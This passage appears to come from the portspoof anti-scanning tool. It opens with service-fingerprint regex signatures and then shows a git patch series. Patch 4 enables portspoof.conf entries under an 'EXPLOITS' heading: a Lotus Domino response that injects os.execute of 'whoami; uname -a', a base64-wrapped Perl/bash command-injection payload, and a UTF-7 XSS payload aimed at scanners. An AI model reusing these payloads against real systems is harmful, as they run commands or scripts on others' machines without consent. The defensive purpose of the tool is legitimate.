3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 -E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 -E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 -E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 -\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 -\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 -\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup -\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 -\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc -\0\0\0\x0b3999 No go\n -2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n -\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. -\0\x19\x02\0\x02\0\x07\0Protocol version mismatch\0 -\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. -\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. -\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) -\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 -\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) -\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 -GIOP\x01\0\x01\x06\0\0\0\0 -\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 -RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n -\0 -default: unknown printer\n -VSE Line Printer Daemon has rejected this request\.\0\0 -no queue to check\n\0 -EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ -\x02rFactorMonitor\x000400\0 -\0\0\0\t51000000\0\0\0\0[^\0] -0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed -02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed -0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead -0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead -0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind -0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 -0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed -0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. -0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded - -TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) -\0\x04\0 -TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 -ActiveFax Server: Es befinden sich insgesamt -\x03\0\x26 -no entries\n -Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 -\x03\0\0\x0b\x06\xd0\0\0\x12.\0 -\x03\0\0\x0b\x06\xd0\0\0\x03.\0 -\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n -\x03\0\0\x0b\x06\xd0\0\x004\x12\0 -.\0\x01.....\0([^\0]+)\0 -\0\0 -\x74\x4e\x63\x50\0\0\0\x10\x33\x33 -\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 -.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 -\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 -\x18\0\x01\x02Invalid packet length\0 -{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} -\x02\x06 -\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 -HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n -\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) -\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 -\0.\0\0[\x02\x04]\0\0\0 -\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) From d8eeb0f11542259b853049443829c500ee30d606 Mon Sep 17 00:00:00 2001 From: Piotr Duszynski Date: Tue, 30 Jul 2013 10:15:38 +0200 Subject: [PATCH 2/6] Removed junked --- src/.DS_Store | Bin 6148 -> 0 bytes src/extra_files/.DS_Store | Bin 6148 -> 0 bytes system_files/.DS_Store | Bin 6148 -> 0 bytes 3 files changed, 0 insertions(+), 0 deletions(-) delete mode 100755 src/.DS_Store delete mode 100644 src/extra_files/.DS_Store delete mode 100644 system_files/.DS_Store diff --git a/src/.DS_Store b/src/.DS_Store deleted file mode 100755 index 5a4c3046996eade5dc989908c673a3bc9dc197e3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%Sr=55Ukc50=eYqael!+7()C4KOjD$AS?uog2z4iU4B}s9|+6Fi{M47p}S^! zyLOm5Y;Oaw&HMfuSOZwn9r5X5ZvNbTW*3z)BAxHJ#}3bU!GNb(_4$NzSFHZP8(t^; z8c9h8O{e z3#P-kj#+}(JVES*VLuSI;@5dtCOuJ6pPdO{ubr1o~S4V zq`*{x%iONL|KHGmnE$6F?WBMd_*V+pVtc#Y@JiKNXP5I{+vs<6ulb_8aUB$fXvf58 i$J}^3zKWu(Yrf|5UN|NOo%x^>^)ukQ$fUquD{ul0nib&y diff --git a/src/extra_files/.DS_Store b/src/extra_files/.DS_Store deleted file mode 100644 index 5008ddfcf53c02e82d7eee2e57c38e5672ef89f6..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3 zem<@ulZcFPQ@L2!n>{z**++&mCkOWA81W14cNZlEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ zLs35+`xjp>T0H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3 zem<@ulZcFPQ@L2!n>{z**++&mCkOWA81W14cNZlEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ zLs35+`xjp>T0 Date: Tue, 30 Jul 2013 10:20:28 +0200 Subject: [PATCH 3/6] Travis support --- .travis.yml | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 .travis.yml diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..6f48f07 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,6 @@ +language: cpp +compiler: + - gcc +# Change this to your needs +script: ./configure && make + From 600287f90f0dddf8ab06c5cc13ad42f43b192547 Mon Sep 17 00:00:00 2001 From: Piotr Duszynski Date: Thu, 1 Aug 2013 22:02:20 +0200 Subject: [PATCH 4/6] Fixed buffer len for recv --- src/connection.cpp | 5 ++--- tools/portspoof.conf | 28 +++++++++++++++++++--------- 2 files changed, 21 insertions(+), 12 deletions(-) diff --git a/src/connection.cpp b/src/connection.cpp index a1346c2..0e60599 100755 --- a/src/connection.cpp +++ b/src/connection.cpp @@ -69,7 +69,7 @@ void* process_connection(void *arg) int tid = *((int*)(&arg)); //int len; string str; - char buffer; + char buffer[1000];//TODO: to be fixed int original_port=DEFAULT_PORT; int n = 0; time_t timestamp; @@ -79,7 +79,6 @@ void* process_connection(void *arg) while(1) { - sleep(1); for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++) { @@ -91,7 +90,7 @@ void* process_connection(void *arg) if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER)) n = 1; // just reply... else - n = recv(threads[tid].clients[i], &buffer,1, 0); + n = recv(threads[tid].clients[i], buffer,1, 0); // deal with different recv buffer size diff --git a/tools/portspoof.conf b/tools/portspoof.conf index e079efc..05d315d 100755 --- a/tools/portspoof.conf +++ b/tools/portspoof.conf @@ -75,23 +75,33 @@ #Example: port range -#51-60 "550 4m2v4 (FUZZ_HERE)" +51-60 "550 4m2v4 (FUZZ_HERE)" #Example: Simple regular expression payloads -#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n" -#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n" -#8082 "word: ... \. \d \w \n" +8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n" +8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n" +8082 "word: ... \. \d \w \n" #Nmap regular expression matched payloads -#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n" -#8101 "220 FUZZ_HERE SMTP ready to roll\r\n" -#8102 "550 12345 FUZZ_HERE" -#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n" -#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
" +8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n" +8101 "220 FUZZ_HERE SMTP ready to roll\r\n" +8102 "550 12345 FUZZ_HERE" +8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n" +8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
" ## EXPLOITS ## +# NMAP +# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4 + +80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--\r\n--\r\n--\r\n--\r\n\r\n--\r\n--\r\n--\r\n--\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a" + #OS cmd injection payload for bash: $(cat output) and `cat output` injections 8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;" + +#McAffe SuperScan UTF7 XSS payload +1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-" + + From 2840d1134174665f5af1f8f0d0190e12365ad6a5 Mon Sep 17 00:00:00 2001 From: Piotr Duszynski Date: Thu, 1 Aug 2013 22:13:56 +0200 Subject: [PATCH 5/6] Small corrections --- src/connection.cpp | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/src/connection.cpp b/src/connection.cpp index 0e60599..72e5ded 100755 --- a/src/connection.cpp +++ b/src/connection.cpp @@ -78,7 +78,8 @@ void* process_connection(void *arg) char* msg; while(1) { - + + usleep(100); for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++) { @@ -90,7 +91,7 @@ void* process_connection(void *arg) if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER)) n = 1; // just reply... else - n = recv(threads[tid].clients[i], buffer,1, 0); + n = recv(threads[tid].clients[i], buffer,1000, 0); // deal with different recv buffer size From 0987aca22ff7a0f2b904573884879f88b5004bbc Mon Sep 17 00:00:00 2001 From: Piotr Duszynski Date: Thu, 1 Aug 2013 22:19:25 +0200 Subject: [PATCH 6/6] Timming issues --- src/connection.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/connection.cpp b/src/connection.cpp index 72e5ded..19ae3dc 100755 --- a/src/connection.cpp +++ b/src/connection.cpp @@ -79,7 +79,7 @@ void* process_connection(void *arg) while(1) { - usleep(100); + sleep(1); for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++) {